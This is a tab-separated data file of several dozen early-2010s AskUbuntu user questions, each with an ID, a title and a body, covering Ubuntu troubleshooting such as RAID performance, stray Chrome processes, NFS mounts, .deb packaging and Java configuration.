27602	raid slow on all levels	i am getting very slow write speeds ( < 1mb ) with raid 1 and raid 0 ( striping and mirroring ) . the read speeds are sufficiently fast but writing is very slow . at first i thought it was just poor performance under raid 1 but it is occuring with raid 0 ( although not as bad ) . i noticed that compared to when ubuntu was on a virtual machine there are multiple instances of kdmflush process running using most of my io ( detected using iotop ) . does anyone have any suggestions as to what could be causing this ?
27604	how can i stop accumulated google chrome background processes ?	sometimes invisible instances of google chrome accumulate and prevent me from starting the browser : $ ps -ef | grep chrome ak 4044 1 4 11:30 ? 00:00:01 /opt/google/chrome/google-chrome ak 4047 4044 0 11:30 ? 00:00:00 /opt/google/chrome/google-chrome ak 4049 1 0 11:30 ? 00:00:00 /opt/google/chrome/chrome -- type=zygote ak 4139 4044 0 11:30 ? 00:00:00 /opt/google/chrome/chrome -- type=plugin -- plugin-path=/home/ak/.config/google-chrome/default/extensions/cpngackimfmofbokmjmljamhdncknpmg/3.0.7_0/plugin/screen_capture_64.so -- lang=en-us -- plugin-data-dir=/home/ak/.config/google-chrome/default -- channel=4044.0x618d838.1464152706 -- enable-crash-reporter=d8ec5832e6b1783fea1f118fc4b1aae0 , ubuntu 10.10 ak 4150 1 3 11:30 ? 00:00:00 /opt/google/chrome/google-chrome ak 4153 4150 0 11:30 ? 00:00:00 /opt/google/chrome/google-chrome ak 4155 1 0 11:30 ? 00:00:00 /opt/google/chrome/chrome -- type=zygote ak 4244 4150 0 11:30 ? 00:00:00 /opt/google/chrome/chrome -- type=plugin -- plugin-path=/home/ak/.config/google-chrome/default/extensions/cpngackimfmofbokmjmljamhdncknpmg/3.0.7_0/plugin/screen_capture_64.so -- lang=en-us -- plugin-data-dir=/home/ak/.config/google-chrome/default -- channel=4150.0x48c1e38.1952918361 -- enable-crash-reporter=d8ec5832e6b1783fea1f118fc4b1aae0 , ubuntu 10.10 ak 4253 1 6 11:30 ? 00:00:01 /opt/google/chrome/google-chrome ak 4256 4253 0 11:30 ? 00:00:00 /opt/google/chrome/google-chrome ak 4258 1 0 11:30 ? 00:00:00 /opt/google/chrome/chrome -- type=zygote ak 4348 4253 0 11:30 ? 00:00:00 /opt/google/chrome/chrome -- type=plugin -- plugin-path=/home/ak/.config/google-chrome/default/extensions/cpngackimfmofbokmjmljamhdncknpmg/3.0.7_0/plugin/screen_capture_64.so -- lang=en-us -- plugin-data-dir=/home/ak/.config/google-chrome/default -- channel=4253.0x598ca38.734301885 -- enable-crash-reporter=d8ec5832e6b1783fea1f118fc4b1aae0 , ubuntu 10.10 ak 4355 1 4 11:30 ? 00:00:00 /opt/google/chrome/google-chrome ak 4358 4355 0 11:30 ? 00:00:00 /opt/google/chrome/google-chrome ak 4360 1 0 11:30 ? 00:00:00 /opt/google/chrome/chrome -- type=zygote ak 4449 4355 0 11:30 ? 00:00:00 /opt/google/chrome/chrome -- type=plugin -- plugin-path=/home/ak/.config/google-chrome/default/extensions/cpngackimfmofbokmjmljamhdncknpmg/3.0.7_0/plugin/screen_capture_64.so -- lang=en-us -- plugin-data-dir=/home/ak/.config/google-chrome/default -- channel=4355.0x4bb6e38.554350998 -- enable-crash-reporter=d8ec5832e6b1783fea1f118fc4b1aae0 , ubuntu 10.10 ak 4457 1 5 11:30 ? 00:00:00 /opt/google/chrome/google-chrome ak 4460 4457 0 11:30 ? 00:00:00 /opt/google/chrome/google-chrome ak 4462 1 0 11:30 ? 00:00:00 /opt/google/chrome/chrome -- type=zygote ak 4553 4457 0 11:30 ? 00:00:00 /opt/google/chrome/chrome -- type=plugin -- plugin-path=/home/ak/.config/google-chrome/default/extensions/cpngackimfmofbokmjmljamhdncknpmg/3.0.7_0/plugin/screen_capture_64.so -- lang=en-us -- plugin-data-dir=/home/ak/.config/google-chrome/default -- channel=4457.0x5338c38.1605325542 -- enable-crash-reporter=d8ec5832e6b1783fea1f118fc4b1aae0 , ubuntu 10.10 ak 4559 1 8 11:30 ? 00:00:00 /opt/google/chrome/google-chrome ak 4562 4559 0 11:30 ? 00:00:00 /opt/google/chrome/google-chrome ak 4564 1 0 11:30 ? 00:00:00 /opt/google/chrome/chrome -- type=zygote ak 4653 4559 0 11:30 ? 00:00:00 /opt/google/chrome/chrome -- type=plugin -- plugin-path=/home/ak/.config/google-chrome/default/extensions/cpngackimfmofbokmjmljamhdncknpmg/3.0.7_0/plugin/screen_capture_64.so -- lang=en-us -- plugin-data-dir=/home/ak/.config/google-chrome/default -- channel=4559.0x60e6638.1319164624 -- enable-crash-reporter=d8ec5832e6b1783fea1f118fc4b1aae0 , ubuntu 10.10 ak 4661 4020 0 11:30 pts/2 00:00:00 grep -- color=auto chrome if i try to start chrome while these are present , the following error message is displayed : your profile could not be opened correctly . some features may be unavailable . please check that the profile exists and you have permission to read and write its contents . short of logging out of ubuntu , how can i get rid of these to allow chrome to start again ? my first guess did n't work as i expected : $ killall google-chrome google-chrome : no process found running kill on each process two times in a row gets the job done : $ kill 4044 4047 4049 4139 4150 4153 4155 4244 4253 4256 4258 4348 4355 4358 4360 4449 4457 4460 4462 4553 4559 4562 4564 4653 $ ! ! kill 4044 4047 4049 4139 4150 4153 4155 4244 4253 4256 4258 4348 4355 4358 4360 4449 4457 4460 4462 4553 4559 4562 4564 4653 bash : kill : ( 4139 ) - no such process bash : kill : ( 4244 ) - no such process bash : kill : ( 4348 ) - no such process bash : kill : ( 4449 ) - no such process bash : kill : ( 4553 ) - no such process bash : kill : ( 4653 ) - no such process but i would love to have a less cumbersome solution .
27607	how to get google earth installed via .deb ?	now i 've really messed things up . a long time ago , i installed google earth via a binary installer from google ( v5.1 , i think ) . google now has version 6 available as a .deb , so i decided to install that . however , that seems to have messed up both installations and now no matter what i do , i ca n't get google earth to run . here 's what i do : sudo apt-get purge google-earth-stable sudo dpkg -i -- force-overwrite google-earth-stable_current_amd64.deb which i thought would work ... but when i run google-earth , i get : /usr/bin/google-earth : 43 : ./googleearth-bin : not found how can i get it installed now ?
27609	sharing a mounted truecrypt volume via samba	been banging my head against the wall on this one for a while . i have an encrypted ( via truecrypt ) partition on a drive . in windows , i mount it locally and share it on my local network . i 'm trying to do the same in ubuntu 10.10 but am running into permission issues . the tc volume has funny permissions and i just ca n't seem to figure out a way to access it ( unsecurely of course ) over my network . other non-tc volume shares work just fine . to recap , i mount a truecrypt volume in ubuntu and set up a samba share as normal . the share shows up on my local network but accessing it gives 'permission denied ' . mounting as a network drive using a password does not seem to work either . any insight would be greatly appreciated .
27610	how to run programs each time the system boots up ?	what is the command line in bash to make a program run every time the system boots up ?
27619	strange suspend/resume failure on hp g61	my hp g61 428ca has an unusual problem . suspend/resume works fine as long as i do n't suspend it for longer than 6 or 8 hours . if i do this , it wo n't wake up ... the keyboard lights flash reporting what the manual describes as a `` bios corruption '' . does anyone know of any tweaks/quirks that i can use to resolve this problem ?
27621	how do i map sysreq to a key on my macbook keyboard ?	my macbook laptop keyboard does n't have a sysreq key . can i change an existing key to act like sysreq ? = )
27623	opening files in nautilus with the space key , how to disable ?	is there a way to prevent nautilus from opening a file or entering a directory when pressing the space key ? i would like to disable this behavior . is this possible ?
27627	help identify this emacs color theme	i found this screenshot here : http : //code.djangoproject.com/wiki/emacs
27631	inetd limit access to one user	i am using telnet because of a barcode reader . it is pretty old before 2000 i think and it seems that it supports only telnet via wifi connection . however how can i restrict telnet access to only this device ip and to only one user ? how can i force that only a terminal application is executed and when it is closed no one can make any change to the system ?
27636	how do i change passwords that have been saved in the keyring ?	i created a saved password via system ▸ preferences ▸ passwords and encryption keys ▸ file ▸ new ▸ stored password . how can i update it ?
27638	compiling midnight commander	i need help with compiling midnight commander so that i can make some changes ( for educational purposes ) . or even creating the make files . after downloading latest version from git . i try to perform ./autogen.sh . result is : maint/autopoint : 418 : can not open /usr/share/gettext/archive.tar.gz : no such file tar : this does not look like a tar archive tar : exiting with failure status due to previous errors cvs checkout : can not find module `archive ' - ignored find : `archive ' : no such file or directory find : `archive ' : no such file or directory find : `archive ' : no such file or directory autopoint : *** infrastructure files for version 0.14.3 not found ; this is autopoint from gnu gettext-tools 0.17 autopoint : *** stop . i have installed gettext and folder /usr/share/gettext does exist . but there is no archive.tar.gz . i have no idea what should this archive contain or where to get it . can you help me please ?
27641	integrate emesene with the messaging menu	is there anyway of integrating emesene with the messaging menu ?
27648	why does my clock applet calendar appear in the wrong place ?	i have a clock applet on the right hand side of a panel at the bottom of my screen . when i click on it for some reason the calendar box appears at the top right hand corner and is partially off the screen . as you might imagine this is quite annoying and limits its usefulness . how can i make it appear in the correct place ?
27653	how does /will unity handle multiple monitors ?	hi ! what is planned for multiple monitor support in unity ? i ca n't seem to find a bug/blueprint anywhere , or a markup , or anything , actually . . . : / thanks !
27660	how do i get network working on a dell n5010 ?	hey . i just formatted a dell n5010 and installed ubuntu 10.10 . now , when i try to access the internet it does n't find the available networks . informations about it : my network is set to broadcast ssid ; already typed lspci , and it doesnt returns my wireless card ; tried installing windows drivers from fabricant cd usind diswrapper , but it says it cant complete the installation because it cant find some `` device '' folder ; i do n't know what else to do , i switch the wireless button on/off and it just ca n't see any wireless connection , includin mine . here are the informations about lspci : 00:00.0 host bridge : intel corporation core processor dram controller ( rev 18 ) 00:02.0 vga compatible controller : intel corporation core processor integrated graphics controller ( rev 18 ) 00:16.0 communication controller : intel corporation 5 series/3400 series chipset heci controller ( rev 06 ) 00:1a.0 usb controller : intel corporation 5 series/3400 series chipset usb2 enhanced host controller ( rev 06 ) 00:1b.0 audio device : intel corporation 5 series/3400 series chipset high definition audio ( rev 06 ) 00:1c.0 pci bridge : intel corporation 5 series/3400 series chipset pci express root port 1 ( rev 06 ) 00:1c.1 pci bridge : intel corporation 5 series/3400 series chipset pci express root port 2 ( rev 06 ) 00:1c.2 pci bridge : intel corporation 5 series/3400 series chipset pci express root port 3 ( rev 06 ) 00:1c.4 pci bridge : intel corporation 5 series/3400 series chipset pci express root port 5 ( rev 06 ) 00:1d.0 usb controller : intel corporation 5 series/3400 series chipset usb2 enhanced host controller ( rev 06 ) 00:1e.0 pci bridge : intel corporation 82801 mobile pci bridge ( rev a6 ) 00:1f.0 isa bridge : intel corporation mobile 5 series chipset lpc interface controller ( rev 06 ) 00:1f.2 sata controller : intel corporation 5 series/3400 series chipset 6 port sata ahci controller ( rev 06 ) 00:1f.3 smbus : intel corporation 5 series/3400 series chipset smbus controller ( rev 06 ) 00:1f.6 signal processing controller : intel corporation 5 series/3400 series chipset thermal subsystem ( rev 06 ) 12:00.0 network controller : broadcom corporation bcm4313 802.11b/g lp-phy ( rev 01 ) 13:00.0 ethernet controller : realtek semiconductor co. , ltd. rtl8101e/rtl8102e pci express fast ethernet controller ( rev 02 ) thanks !
27661	how can you print a text file via gedit from the command line ?	i 'd like to use gedit or some similar program just as a page formatter and pipe some text through it and onto the printer . | lpr just does n't cut it in the presentation department . the printed output is subpar , even if i try to tinker with the margin and font size options . but i like the way text looks like when printed from gedit . is there a way to have the best of both worlds and use a command line pipeline to print a text file with gedit-quality formatting ?
27663	ubuntu installer thinks my drive is empty , does not see windows paritions	i am trying to install ubuntu10.10 64bit . i just installed windows 7 64bit moments ago . my drive is currently partitioned like so : 100mb boot partition ( automatically made by windows 7 installer ) 390gb windows partition ~1.6tb free space when i go through the ubuntu installer it does not give me the option to install alongside another operating system . my only options are to use the entire disk or to specify partitions manually . when i chose to specify partitions manually it tells me that the drive is all free space ! windows is still booting and behaving normally , and i had not doing anything in windows yet ( had simply installed , booted for first time , then immediately restarted ) . i am even able to mount the windows partition within ubuntu live cd , and see it in the disk viewer ( not gparted ) . gparted in ubuntu live cd again reports no partitions , all free space . not sure what to do : s. i have installed windows7 alongside ubuntu countless times , even ubuntu 10.10 . thank you very much for your help : ) . edit : i tried adding a partition through disk utility since it identifies the parititions ; it failed . however gparted now identifies the free sapces as a ntfs partition . i used to have ubuntu as my only o/s before i wiped to add windows 7 . i wonder if there is some remnant of the old partition table left over that the windows installer was n't wiping over , so gparted was getting confused on where partitions started/ended . i am trying to create the partition table/partitions with gparted now and see if that helps . i got to install windows 7 first unfortunately since i can never figure out how to repair grub once windows has stomped on it .
27670	photoshop alternative for ubuntu	hello . i am working in ubuntu . i want to do some editing and drawing . on windows i was using adobe photoshop like software . now i want to know which are the software available for doing this . also , is there any default software for drawing an image ?
27671	how to apply disk quota in ubuntu server on a vps ?	i have a vps with ubuntu server 10.04 installed on it.now i want to have some shell users with limited home folder size . it seems quota is the best way to do this , but all tutorials require editing /etc/fstab and add usrquota or grpquota to /home partition options . as my /etc/fstab looks like this : proc /proc proc defaults 0 0 none /dev/pts devpts rw 0 0 how can i apply quota ?
27674	which is more efficient , gimp or inkscape ?	can someone tell me which is more efficient -- gimp , or inkscape ? i am new to linux .
27677	can not find install-sh , install.sh , or shtool in ac-aux	this is my first time trying to compile and install anything on a linux machine . i got the latest version of https : //github.com/processone/exmpp via git and read the instructions which state : 2 . build and install exmpp uses the autotools . therefore the process is quite common : $ ./configure $ make $ sudo make install after type ./configure i get the error can not find install-sh , install.sh , or shtool in ac-aux google was of little to no help . not sure at all what i 'm supposed to do . any help would be much appreciated
27682	what are the most common shortcuts you use ?	i 'm a windows guy and i 'm really trying to get into using linux . i 've just installed ubuntu and am missing all of my windows shortcuts like : win+e open file browser win+r cmd open the command prompt there are a lot more but these two i use constantly . i 'm looking for things that are going to make me a lot more productive a lot quicker . thanks
27685	how do i add a repository , but only for a specific package/version and its dependencies ?	i would like to use the natty narwhal repository for puppet packages , but i donât want to upgrade my whole server . is that possible ? my current solution is to fetch the .deb packages by hand
27691	edubuntu presentation template	i am a part of a team that try to popularize linux and free software in academic institutions . i make distribution specific presentations . my duty is to introduce students to edubuntu . i wanted to know if there is any openoffice.org/libreoffice template featuring edubuntu logo/certain edubuntu bar on top/bottom which can be used for such presentations ? is anyone aware of such a resource ? even in the ubuntu marketing wiki here https : //wiki.ubuntu.com/presentations # edubuntu such a template is said to be under progress .
27701	how to set current default font-families to websites in chromium ?	i would like to set a default font-family in chromium . i want to make a chinese font ! important for all the pages .
27705	concatenation of two command in one single command	while read pos ; do string1= echo $ pos | cut -c 20-38 string2= '' = $ pos '' string3= '' $ string1 $ string2 '' echo `` $ string3 '' done < file this is the code of my script . i want to display the output in one single line , but the output comes on different lines . pos = abcdefghi1234567890qwertyuxy.tar.gz string1 = 1234567890qwertyuxy string2 = abcdefghi1234567890qwertyuxy.tar.gz output wanted : 1234567890qwertyuxy abcdefghi1234567890qwertyuxy.tar.gz but the two strings are displayed in two different lines . i want to display the output in 1 line .
27706	general problem : no sound , ca n't reduce brightness . lspci attached	i 've installed ubuntu lucid in my lappy ( compaq cq42 173tu ) before with wubi , the sound and brightness problems were still there . i thought it was a problem due to installing through wubi . so i installed it again from boot . but the problem persists . there is no sound at all , but the os seems like that it has no problem at all . and also , i can not reduce brightness . the brightness applet says `` can not get laptop panel brightness '' .. here is the the output by lspci - 00:00.0 host bridge : intel corporation core processor dram controller ( rev 02 ) 00:02.0 vga compatible controller : intel corporation core processor integrated graphics controller ( rev 02 ) 00:16.0 communication controller : intel corporation 5 series/3400 series chipset heci controller ( rev 06 ) 00:1a.0 usb controller : intel corporation 5 series/3400 series chipset usb2 enhanced host controller ( rev 05 ) 00:1b.0 audio device : intel corporation 5 series/3400 series chipset high definition audio ( rev 05 ) 00:1c.0 pci bridge : intel corporation 5 series/3400 series chipset pci express root port 1 ( rev 05 ) 00:1c.1 pci bridge : intel corporation 5 series/3400 series chipset pci express root port 2 ( rev 05 ) 00:1d.0 usb controller : intel corporation 5 series/3400 series chipset usb2 enhanced host controller ( rev 05 ) 00:1e.0 pci bridge : intel corporation 82801 mobile pci bridge ( rev a5 ) 00:1f.0 isa bridge : intel corporation mobile 5 series chipset lpc interface controller ( rev 05 ) 00:1f.2 sata controller : intel corporation 5 series/3400 series chipset 4 port sata ahci controller ( rev 05 ) 00:1f.3 smbus : intel corporation 5 series/3400 series chipset smbus controller ( rev 05 ) 02:00.0 network controller : atheros communications inc. ar9285 wireless network adapter ( pci-express ) ( rev 01 ) 03:00.0 ethernet controller : realtek semiconductor co. , ltd. rtl8101e/rtl8102e pci express fast ethernet controller ( rev 02 ) ff:00.0 host bridge : intel corporation core processor quickpath architecture generic non-core registers ( rev 02 ) ff:00.1 host bridge : intel corporation core processor quickpath architecture system address decoder ( rev 02 ) ff:02.0 host bridge : intel corporation core processor qpi link 0 ( rev 02 ) ff:02.1 host bridge : intel corporation core processor qpi physical 0 ( rev 02 ) ff:02.2 host bridge : intel corporation core processor reserved ( rev 02 ) ff:02.3 host bridge : intel corporation core processor reserved ( rev 02 ) and also , i can not check the temperature . there is no folder inside thermal_zone .. any help is appreciated .
27707	what happens to the desktopcouch mailinglist ?	i want to ask a question to the desktopcouch mailinglist , but nothing happens . the last post is about four month old http : //groups.google.com/group/desktop-couchdb/topics is there a new mailinglist ? or is the mailinglist replaced by askubuntu.com ?
27712	is there a way to detect if i 'm running on my laptop monitor or external monitor ?	i have a little netbook and when not mobile use it with a 22 '' monitor . now because of the reduced real-estate when running on the laptop monitor it would be good to be able to run a script to change various settings or preferences . is there a way to detect this ?
27714	how to install an older version of java	i updated my installation of the sun-java6-jdk package today to version 6.24-1build0.10.10.1 after being prompted by the update manager . however this now causes some compilation failures so i 'd like to revert back to the previous version that i had installed . i 've tried using synaptic but the 'force version ' menu command is disabled . i 've tried the following command to install the previous version sudo apt-get install sun-java6-jdk=6.22-0ubuntu1~10.10 but i 'm not sure that i have the correct version : reading package lists ... done building dependency tree reading state information ... done e : version ‘6.22-0ubuntu1~10.10’ for ‘sun-java6-jdk’ was not found i 've taken this version number from this changelog : https : //launchpad.net/ubuntu/+source/sun-java6/+changelog is this the correct way to install a previous version of a package ? have i got the correct version from the sun-java6 change log ?
27715	create a .deb package from scripts or binaries	i searched for a simple way to create .deb packages for things which have no source code to compile ( configs , shellscripts , proprietary software ) . this was quite a problem because most of the package tutorials are assuming you have a source tarball you want to compile . then i 've found this short tutorial ( german ) . afterwards , i created a small script to create a simple repository . like this : rm /export/my-repository/repository/* cd /home/tdeutsch/deb-pkg for i in $ ( ls | grep my ) ; do dpkg -b ./ $ i /export/my-repository/repository/ $ i.deb ; done cd /export/avanon-repository/repository gpg -- armor -- export `` my package signing key '' > publickey apt-ftparchive packages ./ | gzip > packages.gz apt-ftparchive packages ./ > packages apt-ftparchive release ./ > /tmp/release.tmp ; mv /tmp/release.tmp release gpg -- output release.gpg -ba release i added the key to the apt keyring and included the source like this : deb http : //my.default.com/my-repository/ ./ it looks like the repo itself is working well ( i ran into some problems , to fix them i needed to add the packages twice and make the temp-file workaround for the release file ) . i also put some downloaded .deb into the repo , it looks like they are also working without problems . but my self created packages did n't ... wenn i do sudo apt-get update , they are causing errors like this : e : problem parsing dependency depends e : error occurred while processing my-printerconf ( newversion2 ) e : problem with mergelist /var/lib/apt/lists/my.default.com_my-repository_._packages e : the package lists or status file could not be parsed or opened . has anyone an idea what i did wrong ? update 2012-03-06 : just a a hint for another person who is searching for a easy way to create debs : take a look at fpm .
27716	how to set which monitor the menu bar appears on ?	i 'm running on a tiny netbook attached to a 22 '' monitor . when i 'm using it without the monitor it makes sense to have the menu bar on the laptop monitor but when i have the big monitor plugged in i want the menu bar on the big monitor . how can i set it up this way ?
27721	entity-relationship modeling software	i 'm looking for a software that will let me draw entity-relationship models . something similar to microsoft visio would be nice . what software would you recommend ?
27723	why ufw has to be ( re ) started at boot time if it 's only iptables rule manager ?	readme from source package says : when installing ufw from source , you will also need to integrate it into your boot process for the firewall to start when you restart your system . depending on your needs , this can be as simple as adding the following to a startup script ( eg rc.local for systems that use it ) : # /lib/ufw/ufw-init start for systems that use sysv initscripts , an example script is provided in doc/initscript.example . see doc/upstart.example for an upstart example . consult your distribution 's documentation for the proper way to modify your boot process . on my system i have this : # /etc/ufw/ufw.conf # # set to yes to start on boot . if setting this remotely , be sure to add a rule # to allow your remote connection before starting ufw . eg : 'ufw allow 22/tcp' enabled=yes so , why does simple iptables rule manager need to be started at boot time ? is there any secret to that , or it merely checks if all rules are in place ?
27728	dell inspiron 1120 ubuntu light - > desktop and now i 'm having problems with wifi and suspend	i got a dell inspiron 1120 which ships with ubuntu light , as well as windows . my wife prefers ubuntu , but obviously outside of web stuff , you ca n't do a lot with light , so i went ahead and installed the desktop version of ubuntu ( 10.10 / maverick ) . whereas before it suspended beautifully and connected to wifi networks flawlessly , it now displays the following problems : it seems to suspend ok , but on resume , the screen remains blank , even though the computer appears to wake up again . wifi does n't connect . i tried using the suggested proprietary drivers , and those do n't seem to change the situation . all in all , a bit frustrating to run into these sorts of `` regressions '' - does anyone know what sort of drivers and such ubuntu light might have shipped with for this computer that made it work so well ? unfortunately , i wiped the disk in order to install the desktop version of ubuntu .
27734	all command need privilage	i try to install hping3 in my ubuntu 8.04 but after installation when i want to hping3 i got this error : command 'hping3 ' is available in '/usr/sbin/hping3 ' the command could not be located because '/usr/sbin ' is not included in the path environment variable . this is most likely caused by the lack of administrative priviledges associated with your user account . also when i try to run ifconfig i get this : command 'ifconfig ' is available in '/sbin/ifconfig ' the command could not be located because '/sbin ' is not included in the path environment variable . this is most likely caused by the lack of administrative priviledges associated with your user account . first it needs to run sudo su and then run the command . is it normal ? or i miss something ? when i run echo $ path i get : /usr/local/bin : /usr/bin : /bin : /usr/bin/x11 : /usr/games : /home/amirreza/simulator/ns-allinone-2.33/bin : /home/amirreza/simulator/ns-allinone-2.33/tcl8.4.18/unix : /home/amirreza/simulator/ns-allinone-2.33/tk8.4.18/unix : /home/amirreza/simulator/ns-allinone-2.33/ns-2.33/ : /home/amirreza/simulator/ns-allinone-2.33/nam-1.14/
27737	how can i change the storage location of /var/lib/mlocate.db ?	it 's a big file for me and i 'd like to put it on a different hard drive than my root partition is on . like to add : i 'd like this to work for the automatic runs of updatedb . i checked the man pages for updatedb.conf and could n't see anything there that would let me change the path .
27745	how do i make changes with x input permanent ?	i need to disable my laptop keyboard and use only my usb keyboard , to do this i uses the xinput set-prop command , and since my keyboard id is 16 , my command is xinput set-prop 16 `` device enabled '' 0 but when o restart my computer , i need to re-enter the command again , and this is a problem because my internal keyboard has been acting crazy , how do save this changes ? ?
27749	how do i make ubuntu system invisible to other systems on wireless network ?	how can i hide my computer 's presence from other system ( s ) on the same wireless network ? windows allows you to switch off network discovery ( though i 'm not sure if it affects the visibility on other oss ) , and i 'm seeking a similar functionality for ubuntu and linux . it seems that many of you are inclined to think that this question has something to do with shares however , this has nothing to do with them , i simply do not want my system to be visible in the network folder and it 's equivalent on other oss .
27751	how do i make ubuntu full scale in virtual box	i have the guest additions installed . i 've increased the resolution to ( 1600x1200 max ) . my monitor is a 25 '' ( widescreen ) and supports up to 1920x1280 . how do i get the window to resize to fill the entire screen . it seems like ubuntu only supports 4:3 ratio and not 16:9 . is there a way to fix this ?
27752	`` untrusted connection '' warning in empathy	today when i opened empathy i got this ( unusual ) error box . i have never got this warning before regarding untrusted connection . what should i do ? is it a security risk if i continue without a second guess .
27753	how can i get an nfs mount in fstab to use the bg option to mount a server when it eventually comes up	i 've got an nfs server and several nfs clients , if i reboot the server , then when the client comes up ( if the server is unavailable ) , i can get it to either skip the nfs mount or prompt me to ask how to continue . however in man nfs it talks about a bg option , which should fork the mount to the background and retry the connection periodically ( dmesg says every 90 seconds ) . when i try that , the client skips the non-existent server , but never seems to retry the connection when the server does come up . how can i make it work ? this is my fstab setting : server : /var/www /var/www nfs rsize=8192 , wsize=8192 , timeo=14 , intr , bg , retry=100 , nobootwait 0 0 any ideas ?
27755	`` find '' command and piping its output through another program	this is not an ubuntu specific quesion , it applies to all unix/linux . how can i run a command like this : find . -maxdepth 1 -type d -print -exec svn info `` { } '' | grep url \ ; the command above does n't do what i want , i ca n't seem to pipe the output of the svn info to grep . this works , but the output contains much more than i need : find . -maxdepth 1 -type d -print -exec svn info `` { } '' \ ; any ideas ?
27760	remote desktop as root without logging in first	i 'm using a mac to do remote desktop into an ubuntu machine ; there are two problems : i have to login as root to ignore the keyring notification that would otherwise pop up on the ubuntu desktop when i try to connect from the mac . this one i can get around by logging in as root , but i ca n't figure out how to auto login , as ubuntu makes that difficult ( i know it 's not safe , etc etc , but i 'm doing testing on an internal network ... i do n't care ) . i have to login . big problem . unless i physically login on the box , i ca n't access remote desktop . i ca n't even see it in the mac `` finder '' list until i login ; does anybody know of a workaround ?
27766	how do i change/remove the handle graphic in panel ?	i want to change the handle.. ..so that it is enabled , but does n't appear . how can i do this ? i am using the gnome global menu applet by the way .
27767	to be granted root rights while browsing files/directories with nautilus 2.30	i 'd like to know if there a way to be granted root rights while using nautilus 2.30 ? for example i 'd like to move some old folders of long unused users from the home directory - remains of previous distros ( debian ) . of course i can open a terminal , but i want to know if it is possible to do that with a mouse in nautilus : - ) . thx !
27770	is there a tool to encrypt a file or directory ?	what 's the most popular way to do that ?
27775	how do i minimize all the windows using a keyboard shortcut ?	is there a keyboard shortcut to minimize all windows , like super+m on windows ?
27784	does dist-upgrade require ppa software to be uninstalled first ?	i 'm still running ubuntu 10.04 with quite a few ppas . amongst the ppas there is guiodic ( guido iodice ) lucid quasi-rolling : ) ppa which brings most recent versions of many programs to my desktop . my steps : sudo update-manager -d click on upgrade on the appearing window wait for the magic to happen : prepare to upgrade and setting new software channels during 'calculating the changes ' i will get the following error message in the panel an error occurred , please run package manager form the right-click menu or apt-get in a terminal to see what is wrong . the error message was : ' error : marking the upgrade ( e : error , pkgproblemresolver : :resolver generated breaks , this may be caused by help packages . ) 'this usually means that your installed packages have unmet dependencies when i check synaptic/apt-get i ca n't find any errors or hint toward broken packages could this error be because of many ppa versions being newer than 10.04 original versions ?
27789	editing gtk theme ( adding a border )	i am using a gtk theme which i love except that it does n't have borders around the windows . if i am on a web page ( for example ) with a white background and my wallpaper is white i do n't know where the web page starts . what is worse , sometimes that type of thing happens with other windows , where i ca n't tell where the one window start and the other ends . is there a way to edit gtk themes ? more specifically , is there a way to edit a theme so that it will display a border around windows ?
27791	how can i export my contacts from ubuntu one ?	i 'm tired of ubuntu one failing to sync with my evolution installation . i want to start using funambol , or google , or anything else that works consistently . i need to know how to export my ubuntu one contacts to a csv , or other common file type .
27797	to clone a filesystem from a remote system to a local hd	i 'd make a backup of a entire remote filesystem ext3 to a local hd . this operation has to be made using ssh . the backup has to be get from the client pc and not give to the server . i hope was clear to explain my issue . some one could suggest me how to resolve it ? thank you so much !
27799	how to use epos ?	when i installed epos : sudo apt-get install epos and try to use say : say hello the terminal says : hello # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # t could not open localsound device , error 2 client side error : could not set up a stream how can i configure this software to make it run correctly ?
27804	using microphone input port as headphone output	i have one audio output jack and one audio input jack on my laptop . i want to use it for real time audio mixing , and i need to have another discrete output for headphones that is independent of the master out . i want to know if it is possible to reconfigure the microphone input jack as an output jack , and if so , how to go about doing so . thanks .
27811	is there a way to make nautilus run individual processes ?	is there a way to make running `` nautilus '' create a new process , instead of using the existing one ? i 'm annoyed with my dock 's nautilus launchers thinking the nautilus window is a new application .
27817	how to install mysql db while offline ?	i have downloaded mysql-5.5.9-linux2.6-i686.tar.gz file . i do n't know how to install it into my ubuntu os . i do n't have an internet connection , i 'm posting here from browsing center . i can download files from here , but i ca n't connect my laptop directly to the internet . is there any way to install mysql while offline ?
27819	how do i update the firmware on an intel x25m ?	as i mentioned earlier , i have installed ubuntu on x25m 80 gb ssd and ubuntu is the only os on my laptop . how do i check and update the ssd firmware ? on intel 's site , everything is for windows : ( anyone having experience doing this ?
27823	how do i set gvim as my default text editor instead of gedit ?	i know i could use something like ubuntu tweak to change the file associations for each file . but i am wondering if there is a way to do it faster and just set the system so that all the files that would have been opened by gedit are now going to be handled by gvim .
27824	how to start applications at startup ?	how do i start a application when ubuntu starts ?
27826	how to configure my system so that all windows start maximized ?	every time i open a terminal or an application like inkscape i have to click the maximize button because by default they open in a small size . is there a way i can configure my system so that whenever a new program opens , it uses the whole screen ? here is an example of how small the window of inkscape is when it opens :
27828	is encrypting the home directory on an encrypted lvm installation overkill ?	i am installing from the alternate cd and using the lvm encrypted hard drive . the installer is now asking if i want to encrypt my home directory , is this overkill ?
27829	i have a huge boot fail ... .gnome power manager	the thing is gnome power mangager is n't working and everything is seen in crappy graphics , when i log in , the same error message appears and says something is wrong with gnome power management , it also said the xorg server has failed ... true this for my virtual machine , but the same message appears for my desktop , the vm is more important to me : d
27832	the annoyed configuration of java-6-openjdk	i want to change the java environment to java-6-openjdk . /etc/environment : path= '' /usr/local/sbin : /usr/local/bin : /usr/sbin : /usr/bin : /sbin : /bin : /usr/games '' java_home=/usr/lib/jvm/java-6-openjdk/ classpath= . : $ classpath : $ java_home/lib java -version : java version `` 1.6.0_20 '' openjdk runtime environment ( icedtea6 1.9.5 ) ( 6b20-1.9.5-0ubuntu1~10.04.1 ) openjdk 64-bit server vm ( build 19.0-b09 , mixed mode ) javac -version : javac 1.6.0_20 but in the shell : the echo $ java_home result is /usr/lib/jvm/java-6-sun-1.6.0.22 while the $ classpath is /usr/lib/jvm/java-6-sun-1.6.0.22/lib . how to find the other files in which $ java_home & $ classpath value is setted by the java-6-sun-1.6.0.22 location ?
